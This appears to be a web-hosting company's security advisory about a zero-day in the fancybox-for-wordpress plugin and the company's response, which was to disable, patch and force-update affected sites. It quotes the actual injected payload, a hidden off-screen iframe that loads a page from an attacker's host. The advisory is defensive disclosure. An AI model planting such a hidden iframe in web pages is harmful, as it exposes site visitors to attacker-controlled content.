On the WordPress community support forum, members reported that they are seeing the below malicious code being injected into their (compromised) sites:
document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/
With the help of Konstantin Kovshenin and Gennady Kovshenin the community has analyzed the sites reported to be affected and the ‘culprit’ has been identified as a vulnerability in the fancybox-for-wordpress plugin.
With the source of the vulnerability identified and confirmed, the fancybox-for-wordpress plugin was temporarily removed from the WordPress Plugins Directory.
Are websites hosted on Pressidium vulnerable? NO
After receiving word of the new vulnerability along with the possibility of this new & very serious Zero-Day attack vector, our team immediately began investigating by running an initial analysis on the plugin. We confirmed that the plugin’s vulnerability allows an attacker to insert malware (script or any content) into the vulnerable website.
We then immediately disabled the plugin on all customer websites which were found to be vulnerable. Shortly after fancybox-for-wordpress plugin author Jose Pardilla informed the community (forum post here) that a patch which resolves the vulnerability is now available (v3.0.3).
We’ve notified all users using the plugin and have force updated every vulnerable site hosted on Pressidium. The plugin has now been re-enabled for all previously affected users.
At Pressidium, we take security very seriously, and we swiftly took all of the above actions in-order to protect our customers from this very serious zero-day vulnerability. Should you have any concerns or need any more information about security provided by the Pressidium® Pinnacle Platform, please do not hesitate to contact our support.